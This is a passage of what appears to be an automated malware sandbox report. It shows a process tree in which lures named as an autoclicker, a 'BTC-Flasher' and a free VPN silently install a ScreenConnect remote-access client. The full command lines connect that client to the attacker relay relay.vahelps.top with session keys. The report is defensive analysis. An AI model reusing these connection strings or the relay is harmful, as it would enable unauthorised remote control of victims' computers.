                                                  • System Location Discovery: System Language Discovery
                                                  PID:2352
                                                • C:\Windows\syswow64\MsiExec.exe
                                                  C:\Windows\syswow64\MsiExec.exe -Embedding 3B1B9C597AEA9010FCAF39907D2E9063 E Global\MSI0000
                                                  2⤵
                                                  • Loads dropped DLL
                                                  • System Location Discovery: System Language Discovery
                                                  PID:4824
                                                • C:\Windows\syswow64\MsiExec.exe
                                                  C:\Windows\syswow64\MsiExec.exe -Embedding 89B8F36B5097067F3BBED7A68D7C8476 C
                                                  2⤵
                                                  • Loads dropped DLL
                                                  • System Location Discovery: System Language Discovery
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:3632
                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSIE713.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_241297203 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                                                    3⤵
                                                    • Loads dropped DLL
                                                    • System Location Discovery: System Language Discovery
                                                    PID:996
                                                • C:\Windows\syswow64\MsiExec.exe
                                                  C:\Windows\syswow64\MsiExec.exe -Embedding 5D41985BF1B96B1414A5AB28F558D6FC
                                                  2⤵
                                                  • Loads dropped DLL
                                                  • System Location Discovery: System Language Discovery
                                                  PID:4128
                                                • C:\Windows\syswow64\MsiExec.exe
                                                  C:\Windows\syswow64\MsiExec.exe -Embedding 00E078E3CA27A03288DE8EC44A19694A E Global\MSI0000
                                                  2⤵
                                                  • Loads dropped DLL
                                                  • Drops file in Windows directory
                                                  • System Location Discovery: System Language Discovery
                                                  PID:3064
                                                • C:\Windows\syswow64\MsiExec.exe
                                                  C:\Windows\syswow64\MsiExec.exe -Embedding 58C4699C69D4AA893D4A4F40DCBA4615 C
                                                  2⤵
                                                  • Loads dropped DLL
                                                  • System Location Discovery: System Language Discovery
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:4376
                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSI21CB.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_241312296 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                                                    3⤵
                                                    • Loads dropped DLL
                                                    • System Location Discovery: System Language Discovery
                                                    PID:3820
                                                • C:\Windows\syswow64\MsiExec.exe
                                                  C:\Windows\syswow64\MsiExec.exe -Embedding 3C6B355A5EF4EFC2CF598C26657793FE
                                                  2⤵
                                                  • Loads dropped DLL
                                                  • System Location Discovery: System Language Discovery
                                                  PID:1740
                                                • C:\Windows\syswow64\MsiExec.exe
                                                  C:\Windows\syswow64\MsiExec.exe -Embedding 2768315ABA567584EAF240F4AFC1A088 C
                                                  2⤵
                                                  • Loads dropped DLL
                                                  • System Location Discovery: System Language Discovery
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:3056
                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSI88F1.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_241338671 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                                                    3⤵
                                                    • Loads dropped DLL
                                                    • System Location Discovery: System Language Discovery
                                                    PID:5116
                                                • C:\Windows\syswow64\MsiExec.exe
                                                  C:\Windows\syswow64\MsiExec.exe -Embedding FEEA12BC835B17E2AD65B7C8798CE3AF
                                                  2⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:2604
                                                • C:\Windows\syswow64\MsiExec.exe
                                                  C:\Windows\syswow64\MsiExec.exe -Embedding 2F42ED5C44A32EA13B385C84E3F86E24 E Global\MSI0000
                                                  2⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:1056
                                                • C:\Windows\syswow64\MsiExec.exe
                                                  C:\Windows\syswow64\MsiExec.exe -Embedding 26B8DDF1ED94A63CE5B26EE23F81610F C
                                                  2⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:1792
                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSICF57.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_241487796 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                                                    3⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:2920
                                                • C:\Windows\syswow64\MsiExec.exe
                                                  C:\Windows\syswow64\MsiExec.exe -Embedding 534679E3EBFC08C3DC704D3B0233A5D1
                                                  2⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:2984
                                                • C:\Windows\syswow64\MsiExec.exe
                                                  C:\Windows\syswow64\MsiExec.exe -Embedding 59D8D72F1287F91E0BE7C7C04C28CA83 C
                                                  2⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:396
                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSI16EF.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_241506109 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                                                    3⤵
                                                    • System Location Discovery: System Language Discovery
                                                    PID:3024
                                                • C:\Windows\syswow64\MsiExec.exe
                                                  C:\Windows\syswow64\MsiExec.exe -Embedding C418B454B32A423B899570F451D93DD4
                                                  2⤵
                                                  • System Location Discovery: System Language Discovery
                                                  PID:1244
                                                • C:\Windows\syswow64\MsiExec.exe
                                                  C:\Windows\syswow64\MsiExec.exe -Embedding 1E80FE38758CB1456AB64F2E6DB7A23D E Global\MSI0000
                                                  2⤵
                                                  • Drops file in Windows directory
                                                  • System Location Discovery: System Language Discovery
                                                  PID:604
                                              • C:\Windows\system32\vssvc.exe
                                                C:\Windows\system32\vssvc.exe
                                                1⤵
                                                • Checks SCSI registry key(s)
                                                PID:3792
                                              • C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe
                                                "C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=relay.vahelps.top&p=8041&s=bb212036-9f37-46ca-99ab-ac42f37709e0&k=BgIAAACkAABSU0ExAAgAAAEAAQDhaIar%2bL1KV6GFRlxD7tSQHmgDc5%2bEmz%2bwlbQzwsSBftaKd12u%2bGO%2bh%2bY2hEFVX3Zh17GjJ6Gv%2b2BSJZQ6Ml7neNCJsbKaTGZJ72D12CtD%2b5goZGgHiRpiK%2fdZvtUn2pEZ%2b02WgN%2bFlOPeEVqujt9WSSwilh45puSR3wk5Bcek%2bAJ7DSFc8w2dKB8lMB%2b9Sut13ZAuQGU54iXcCAQKW2FzC%2bdWR6rWMLyLu0Qhovk5WQMHa1gP0VO4sj6hFlzpnPKhV5otTXkkA9Se9MHQ%2fVwzc7LAXB%2fWL51gKwL1KSNJ4JEjPQI46RPKUGEgY7vXp1o49EPqOwAn04LE4Ucaq1K0&t=FREE_VPN"
                                                1⤵
                                                • Sets service image path in registry
                                                • Executes dropped EXE
                                                • Loads dropped DLL
                                                • Drops file in System32 directory
                                                • System Location Discovery: System Language Discovery
                                                • Modifies data under HKEY_USERS
                                                • Suspicious use of WriteProcessMemory
                                                PID:3116
                                                • C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.WindowsClient.exe
                                                  "C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.WindowsClient.exe" "RunRole" "12337850-2b3d-4843-a4e9-32eb8a58f012" "User"
                                                  2⤵
                                                  • Executes dropped EXE
                                                  PID:468
                                              • C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe
                                                "C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=relay.vahelps.top&p=8041&s=bb212036-9f37-46ca-99ab-ac42f37709e0&k=BgIAAACkAABSU0ExAAgAAAEAAQDhaIar%2bL1KV6GFRlxD7tSQHmgDc5%2bEmz%2bwlbQzwsSBftaKd12u%2bGO%2bh%2bY2hEFVX3Zh17GjJ6Gv%2b2BSJZQ6Ml7neNCJsbKaTGZJ72D12CtD%2b5goZGgHiRpiK%2fdZvtUn2pEZ%2b02WgN%2bFlOPeEVqujt9WSSwilh45puSR3wk5Bcek%2bAJ7DSFc8w2dKB8lMB%2b9Sut13ZAuQGU54iXcCAQKW2FzC%2bdWR6rWMLyLu0Qhovk5WQMHa1gP0VO4sj6hFlzpnPKhV5otTXkkA9Se9MHQ%2fVwzc7LAXB%2fWL51gKwL1KSNJ4JEjPQI46RPKUGEgY7vXp1o49EPqOwAn04LE4Ucaq1K0&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAokFQDM4%2bw0%2bEzCeXG6QzxAAAAAACAAAAAAAQZgAAAAEAACAAAADgeT83M%2f34U%2bOreuKiNmlyT7Kyq4KuE%2bSS%2bF6p4KQBzAAAAAAOgAAAAAIAACAAAAAgsaSj3u4PAH11F0QJfWM2gKKseDBoObBO2KFQasP2pKAEAAABgwz8yK0DkwlI9bHqIfbQw%2fRoyvtl%2f572N%2bq3HEvBp0Gkqg0j2nBLTztxhpqFy4tMPG9Hxpp0k2b%2bxVzJXglPXJ1iZj%2f9qecbtUuIWJKr0Kjj0gNz8VyAx8Kq0z0mTle3Pg0zRGse%2f4quQCXP0boHQzcQaWJtURAkBH03sygrUGNIsvyCfBtifq9V6dJqxkhvm%2fsYzce9Qyy%2fOUcAtZMQlhyCEkGXUc1Og5H4zqkSXHBHp%2folntGNBgtV1gRQuxCkOSkUsyhrvwXc1UZ32KPZY6mzZuGjxrmmg3RJv3RuORfeVtumN2yROLKV%2bOk5FKdReXsAxIbnpqyou6AlrosWrSZy75bWU8ersca%2fuDpYNnTWsjA32lAd5zMEq3ovhveHayUIKc8XkW1LEviXT1Zr9hG5ZzTeAWWWn52HrE0%2bXSlaxReJcEH%2beQPe93J42rB56qEwLNolz%2be02KBPJewJ739UIyUrRGvjnKc5AvLKAgPgKCJRTw9sNgFyb9FUYg9XQmYnv127Kj6%2bqypY%2fsy5hDBeJaZ0DWf5WiX5aenfoJRsM%2b57ZobAATK5LWVxHbr8qMpqTmNV4wW4KoaboY3ir2l6hNVIvvv6gNLb%2b44BZKzlANcSrLPGG1jg8u1vooA59JJzaK2kwjdi%2bsw5nfDavLYYMw1i5aD8nVHzDIWruIGRHxCKjWko9aRqHmnCrpRVhzPwzE9oLt9rqCkkpusM9NzH25WPzea5tpEN58LY6rbg3RGoE5nkZQEqbzY%2fysHDPBk5BeAy5%2fUj3d8fbxhR1zOK82xQS1ug3Z4tBuL6EPV4Pq1BSZ7G41eiM%2fZeRU4X7rWgJXE9%2bKaFx42hHHBSNUpT0KEp0yW39D5EcFRZmOmx%2fUz%2bn6Uqbk31rcvcxv9esoYqejXLMXF2t%2fdC0wB7xxEEQlSDKfjNnppjxBNx%2f2DI%2bNlh3Fo64NISf1PipJTnfjrdvQZkpb6O2nXvyMsXKGDslL%2fSfUTmNksWohyvW6EdT3qWivNMXK4Lird3Kfhr9S43Tm5Nh3MO82ktGyzl6wLEBBwRsO0tru7GHhHmVRDXcNGG%2faip5BsB5sJdnFCHN6ANM5P1KvBzIFzUv87wZuSdT45ZEJNNioNCL7ujYu%2fxOEUE5ea5vDm75%2fJLCqPYG43%2bIIVm8vOo8Ok67T9QQnXg9jb34qgu8hk4tvDxOJwuEqreDwNk%2fQGXg7lPkuhcBNUKjled6V7vRJ%2fwzmL4aLKxNdOB2001NKJUglt19ma7i8zscAuxNcxlbc1GcV8EXDnmDIQTf1o1jV%2fJr54pjm6aIsShr6DWkT6DKpEpn9JDmgk48rf8l52KrkX2oPsR5nr%2f2ndnxRmOpPKvQsPgGFhg8bxu0nKJ86axiAmsIajYIHkOnPEQehXGbwztED0vvccPSbG8mcGprE7%2f1C30%2bDbQ%2fToB5Lb9ZBTkmSROa8rSHvtZ6r3WLYCVDCgZnWwRBy3COg8R5bTOfz2vh7QhmQcDodJdexmbu52%2bARaUILBf4HhTZBvHZQgfd0F4ckddVKKl2n6r9QdPu1mr803yMg29nkXOBaAzxo3gTlc0W0AAAADoFFs87XQa6Eg0H6xllB3R%2fKg89oA8YthZyXkBK2eerrxogWh7DI%2fLmir86NTUUIeDMFS9J5gczH9JN6tYaGnZ&t=AUTOCLICKER"
                                                1⤵
                                                • Executes dropped EXE
                                                • Loads dropped DLL
                                                • System Location Discovery: System Language Discovery
                                                • Modifies data under HKEY_USERS
                                                • Suspicious use of WriteProcessMemory
                                                PID:1408
                                                • C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.WindowsClient.exe
                                                  "C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.WindowsClient.exe" "RunRole" "74267e91-e11f-4f86-a437-bf8e66deae5a" "User"
                                                  2⤵
                                                  • Executes dropped EXE
                                                  PID:568
                                              • C:\Users\Admin\AppData\Local\Temp\a\AutoClicker-J-AI.exe
                                                "C:\Users\Admin\AppData\Local\Temp\a\AutoClicker-J-AI.exe"
                                                1⤵
                                                • Executes dropped EXE
                                                • System Location Discovery: System Language Discovery
                                                • Suspicious use of WriteProcessMemory
                                                PID:1028
                                                • C:\Windows\SysWOW64\msiexec.exe
                                                  "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\e9736d81e38965d1\ScreenConnect.ClientSetup.msi"
                                                  2⤵
                                                  • Enumerates connected drives
                                                  • System Location Discovery: System Language Discovery
                                                  PID:2408
                                              • C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe
                                                "C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=relay.vahelps.top&p=8041&s=bb212036-9f37-46ca-99ab-ac42f37709e0&k=BgIAAACkAABSU0ExAAgAAAEAAQDhaIar%2bL1KV6GFRlxD7tSQHmgDc5%2bEmz%2bwlbQzwsSBftaKd12u%2bGO%2bh%2bY2hEFVX3Zh17GjJ6Gv%2b2BSJZQ6Ml7neNCJsbKaTGZJ72D12CtD%2b5goZGgHiRpiK%2fdZvtUn2pEZ%2b02WgN%2bFlOPeEVqujt9WSSwilh45puSR3wk5Bcek%2bAJ7DSFc8w2dKB8lMB%2b9Sut13ZAuQGU54iXcCAQKW2FzC%2bdWR6rWMLyLu0Qhovk5WQMHa1gP0VO4sj6hFlzpnPKhV5otTXkkA9Se9MHQ%2fVwzc7LAXB%2fWL51gKwL1KSNJ4JEjPQI46RPKUGEgY7vXp1o49EPqOwAn04LE4Ucaq1K0&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAokFQDM4%2bw0%2bEzCeXG6QzxAAAAAACAAAAAAAQZgAAAAEAACAAAADgeT83M%2f34U%2bOreuKiNmlyT7Kyq4KuE%2bSS%2bF6p4KQBzAAAAAAOgAAAAAIAACAAAAAgsaSj3u4PAH11F0QJfWM2gKKseDBoObBO2KFQasP2pKAEAAABgwz8yK0DkwlI9bHqIfbQw%2fRoyvtl%2f572N%2bq3HEvBp0Gkqg0j2nBLTztxhpqFy4tMPG9Hxpp0k2b%2bxVzJXglPXJ1iZj%2f9qecbtUuIWJKr0Kjj0gNz8VyAx8Kq0z0mTle3Pg0zRGse%2f4quQCXP0boHQzcQaWJtURAkBH03sygrUGNIsvyCfBtifq9V6dJqxkhvm%2fsYzce9Qyy%2fOUcAtZMQlhyCEkGXUc1Og5H4zqkSXHBHp%2folntGNBgtV1gRQuxCkOSkUsyhrvwXc1UZ32KPZY6mzZuGjxrmmg3RJv3RuORfeVtumN2yROLKV%2bOk5FKdReXsAxIbnpqyou6AlrosWrSZy75bWU8ersca%2fuDpYNnTWsjA32lAd5zMEq3ovhveHayUIKc8XkW1LEviXT1Zr9hG5ZzTeAWWWn52HrE0%2bXSlaxReJcEH%2beQPe93J42rB56qEwLNolz%2be02KBPJewJ739UIyUrRGvjnKc5AvLKAgPgKCJRTw9sNgFyb9FUYg9XQmYnv127Kj6%2bqypY%2fsy5hDBeJaZ0DWf5WiX5aenfoJRsM%2b57ZobAATK5LWVxHbr8qMpqTmNV4wW4KoaboY3ir2l6hNVIvvv6gNLb%2b44BZKzlANcSrLPGG1jg8u1vooA59JJzaK2kwjdi%2bsw5nfDavLYYMw1i5aD8nVHzDIWruIGRHxCKjWko9aRqHmnCrpRVhzPwzE9oLt9rqCkkpusM9NzH25WPzea5tpEN58LY6rbg3RGoE5nkZQEqbzY%2fysHDPBk5BeAy5%2fUj3d8fbxhR1zOK82xQS1ug3Z4tBuL6EPV4Pq1BSZ7G41eiM%2fZeRU4X7rWgJXE9%2bKaFx42hHHBSNUpT0KEp0yW39D5EcFRZmOmx%2fUz%2bn6Uqbk31rcvcxv9esoYqejXLMXF2t%2fdC0wB7xxEEQlSDKfjNnppjxBNx%2f2DI%2bNlh3Fo64NISf1PipJTnfjrdvQZkpb6O2nXvyMsXKGDslL%2fSfUTmNksWohyvW6EdT3qWivNMXK4Lird3Kfhr9S43Tm5Nh3MO82ktGyzl6wLEBBwRsO0tru7GHhHmVRDXcNGG%2faip5BsB5sJdnFCHN6ANM5P1KvBzIFzUv87wZuSdT45ZEJNNioNCL7ujYu%2fxOEUE5ea5vDm75%2fJLCqPYG43%2bIIVm8vOo8Ok67T9QQnXg9jb34qgu8hk4tvDxOJwuEqreDwNk%2fQGXg7lPkuhcBNUKjled6V7vRJ%2fwzmL4aLKxNdOB2001NKJUglt19ma7i8zscAuxNcxlbc1GcV8EXDnmDIQTf1o1jV%2fJr54pjm6aIsShr6DWkT6DKpEpn9JDmgk48rf8l52KrkX2oPsR5nr%2f2ndnxRmOpPKvQsPgGFhg8bxu0nKJ86axiAmsIajYIHkOnPEQehXGbwztED0vvccPSbG8mcGprE7%2f1C30%2bDbQ%2fToB5Lb9ZBTkmSROa8rSHvtZ6r3WLYCVDCgZnWwRBy3COg8R5bTOfz2vh7QhmQcDodJdexmbu52%2bARaUILBf4HhTZBvHZQgfd0F4ckddVKKl2n6r9QdPu1mr803yMg29nkXOBaAzxo3gTlc0W0AAAADoFFs87XQa6Eg0H6xllB3R%2fKg89oA8YthZyXkBK2eerrxogWh7DI%2fLmir86NTUUIeDMFS9J5gczH9JN6tYaGnZ&t=BTC-FLASHER"
                                                1⤵
                                                • Executes dropped EXE
                                                • System Location Discovery: System Language Discovery
                                                • Modifies data under HKEY_USERS
                                                PID:2976
                                                • C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.WindowsClient.exe
                                                  "C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.WindowsClient.exe" "RunRole" "27f58587-14d5-42fd-bfbb-98030a75155c" "User"
                                                  2⤵
                                                  • Executes dropped EXE
                                                  PID:4848
                                              • C:\Users\Admin\AppData\Local\Temp\a\BTC-Flasher.exe
                                                "C:\Users\Admin\AppData\Local\Temp\a\BTC-Flasher.exe"
                                                1⤵
                                                • Executes dropped EXE
                                                • System Location Discovery: System Language Discovery
                                                PID:980
                                                • C:\Windows\SysWOW64\msiexec.exe
                                                  "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\e9736d81e38965d1\ScreenConnect.ClientSetup.msi"
                                                  2⤵
                                                  • Enumerates connected drives
                                                  • System Location Discovery: System Language Discovery
                                                  PID:840
                                              • C:\Users\Admin\AppData\Local\Temp\a\VPN-Installer.exe
                                                "C:\Users\Admin\AppData\Local\Temp\a\VPN-Installer.exe"
                                                1⤵
                                                • Executes dropped EXE
                                                • System Location Discovery: System Language Discovery
                                                PID:5020
                                                • C:\Windows\SysWOW64\msiexec.exe
                                                  "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\e9736d81e38965d1\ScreenConnect.ClientSetup.msi"
                                                  2⤵
                                                  • Enumerates connected drives
                                                  • System Location Discovery: System Language Discovery
                                                  PID:4132
                                              • C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe
                                                "C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=relay.vahelps.top&p=8041&s=bb212036-9f37-46ca-99ab-ac42f37709e0&k=BgIAAACkAABSU0ExAAgAAAEAAQDhaIar%2bL1KV6GFRlxD7tSQHmgDc5%2bEmz%2bwlbQzwsSBftaKd12u%2bGO%2bh%2bY2hEFVX3Zh17GjJ6Gv%2b2BSJZQ6Ml7neNCJsbKaTGZJ72D12CtD%2b5goZGgHiRpiK%2fdZvtUn2pEZ%2b02WgN%2bFlOPeEVqujt9WSSwilh45puSR3wk5Bcek%2bAJ7DSFc8w2dKB8lMB%2b9Sut13ZAuQGU54iXcCAQKW2FzC%2bdWR6rWMLyLu0Qhovk5WQMHa1gP0VO4sj6hFlzpnPKhV5otTXkkA9Se9MHQ%2fVwzc7LAXB%2fWL51gKwL1KSNJ4JEjPQI46RPKUGEgY7vXp1o49EPqOwAn04LE4Ucaq1K0&v=AQAAANCMnd8BFdERjHoAwE%2fCl%2bsBAAAAokFQDM4%2bw0%2bEzCeXG6QzxAAAAAACAAAAAAAQZgAAAAEAACAAAADgeT83M%2f34U%2bOreuKiNmlyT7Kyq4KuE%2bSS%2bF6p4KQBzAAAAAAOgAAAAAIAACAAAAAgsaSj3u4PAH11F0QJfWM2gKKseDBoObBO2KFQasP2pKAEAAABgwz8yK0DkwlI9bHqIfbQw%2fRoyvtl%2f572N%2bq3HEvBp0Gkqg0j2nBLTztxhpqFy4tMPG9Hxpp0k2b%2bxVzJXglPXJ1iZj%2f9qecbtUuIWJKr0Kjj0gNz8VyAx8Kq0z0mTle3Pg0zRGse%2f4quQCXP0boHQzcQaWJtURAkBH03sygrUGNIsvyCfBtifq9V6dJqxkhvm%2fsYzce9Qyy%2fOUcAtZMQlhyCEkGXUc1Og5H4zqkSXHBHp%2folntGNBgtV1gRQuxCkOSkUsyhrvwXc1UZ32KPZY6mzZuGjxrmmg3RJv3RuORfeVtumN2yROLKV%2bOk5FKdReXsAxIbnpqyou6AlrosWrSZy75bWU8ersca%2fuDpYNnTWsjA32lAd5zMEq3ovhveHayUIKc8XkW1LEviXT1Zr9hG5ZzTeAWWWn52HrE0%2bXSlaxReJcEH%2beQPe93J42rB56qEwLNolz%2be02KBPJewJ739UIyUrRGvjnKc5AvLKAgPgKCJRTw9sNgFyb9FUYg9XQmYnv127Kj6%2bqypY%2fsy5hDBeJaZ0DWf5WiX5aenfoJRsM%2b57ZobAATK5LWVxHbr8qMpqTmNV4wW4KoaboY3ir2l6hNVIvvv6gNLb%2b44BZKzlANcSrLPGG1jg8u1vooA59JJzaK2kwjdi%2bsw5nfDavLYYMw1i5aD8nVHzDIWruIGRHxCKjWko9aRqHmnCrpRVhzPwzE9oLt9rqCkkpusM9NzH25WPzea5tpEN58LY6rbg3RGoE5nkZQEqbzY%2fysHDPBk5BeAy5%2fUj3d8fbxhR1zOK82xQS1ug3Z4tBuL6EPV4Pq1BSZ7G41eiM%2fZeRU4X7rWgJXE9%2bKaFx42hHHBSNUpT0KEp0yW39D5EcFRZmOmx%2fUz%2bn6Uqbk31rcvcxv9esoYqejXLMXF2t%2fdC0wB7xxEEQlSDKfjNnppjxBNx%2f2DI%2bNlh3Fo64NISf1PipJTnfjrdvQZkpb6O2nXvyMsXKGDslL%2fSfUTmNksWohyvW6EdT3qWivNMXK4Lird3Kfhr9S43Tm5Nh3MO82ktGyzl6wLEBBwRsO0tru7GHhHmVRDXcNGG%2faip5BsB5sJdnFCHN6ANM5P1KvBzIFzUv87wZuSdT45ZEJNNioNCL7ujYu%2fxOEUE5ea5vDm75%2fJLCqPYG43%2bIIVm8vOo8Ok67T9QQnXg9jb34qgu8hk4tvDxOJwuEqreDwNk%2fQGXg7lPkuhcBNUKjled6V7vRJ%2fwzmL4aLKxNdOB2001NKJUglt19ma7i8zscAuxNcxlbc1GcV8EXDnmDIQTf1o1jV%2fJr54pjm6aIsShr6DWkT6DKpEpn9JDmgk48rf8l52KrkX2oPsR5nr%2f2ndnxRmOpPKvQsPgGFhg8bxu0nKJ86axiAmsIajYIHkOnPEQehXGbwztED0vvccPSbG8mcGprE7%2f1C30%2bDbQ%2fToB5Lb9ZBTkmSROa8rSHvtZ6r3WLYCVDCgZnWwRBy3COg8R5bTOfz2vh7QhmQcDodJdexmbu52%2bARaUILBf4HhTZBvHZQgfd0F4ckddVKKl2n6r9QdPu1mr803yMg29nkXOBaAzxo3gTlc0W0AAAADoFFs87XQa6Eg0H6xllB3R%2fKg89oA8YthZyXkBK2eerrxogWh7DI%2fLmir86NTUUIeDMFS9J5gczH9JN6tYaGnZ&t=FREE_VPN"
                                                1⤵
                                                • Executes dropped EXE
                                                • System Location Discovery: System Language Discovery
                                                • Modifies data under HKEY_USERS
                                                PID:4692
                                                • C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.WindowsClient.exe
                                                  "C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.WindowsClient.exe" "RunRole" "5fb28501-c747-48d3-ac4b-586971fcfd21" "User"
                                                  2⤵
                                                  • Executes dropped EXE
                                                  PID:764
                                              • C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2104.12721.0_x64__8wekyb3d8bbwe\LocalBridge.exe
                                                "C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2104.12721.0_x64__8wekyb3d8bbwe\LocalBridge.exe" /InvokerPRAID: Microsoft.MicrosoftOfficeHub notifications
                                                1⤵
                                                  PID:4768
                                                • C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
                                                  "C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
                                                  1⤵
                                                    PID:1416
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                                                    1⤵
                                                      PID:2320
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                      1⤵
                                                        PID:1612
                                                      • C:\Windows\system32\msiexec.exe
                                                        C:\Windows\system32\msiexec.exe /V
                                                        1⤵
                                                        • Enumerates connected drives
                                                        • Boot or Logon Autostart Execution: Authentication Package
                                                        • Drops file in Program Files directory
                                                        • Drops file in Windows directory
                                                        • Modifies data under HKEY_USERS
                                                        • Modifies registry class
                                                        PID:4048
                                                        • C:\Windows\syswow64\MsiExec.exe
                                                          C:\Windows\syswow64\MsiExec.exe -Embedding E7EE87381CB21AA8F6ED4A84B58BFC33 C
                                                          2⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:3120
                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSIF3C8.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_242349093 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                                                            3⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:2744
                                                        • C:\Windows\syswow64\MsiExec.exe
                                                          C:\Windows\syswow64\MsiExec.exe -Embedding 501C26F1CE30D7B554A79751F99BB4EE
                                                          2⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:4992
                                                        • C:\Windows\syswow64\MsiExec.exe
                                                          C:\Windows\syswow64\MsiExec.exe -Embedding 61A8950CFA1EEDB446376A3DD14F3157 E Global\MSI0000
                                                          2⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:3692
                                                        • C:\Windows\syswow64\MsiExec.exe
                                                          C:\Windows\syswow64\MsiExec.exe -Embedding 8F1D51CFCAEC926228398F458DDE36A1 C
                                                          2⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:2480
                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSI8068.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_242385015 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                                                            3⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:4328
                                                        • C:\Windows\syswow64\MsiExec.exe
                                                          C:\Windows\syswow64\MsiExec.exe -Embedding F1388A9BCDC3D64ED9DD91AC684C718E
                                                          2⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:904
                                                      • C:\Windows\system32\vssvc.exe
                                                        C:\Windows\system32\vssvc.exe
                                                        1⤵
                                                          PID:2532
                                                        • C:\Program Files (x86)\ScreenConnect Client (e9736d81e38965d1)\ScreenConnect.ClientService.exe
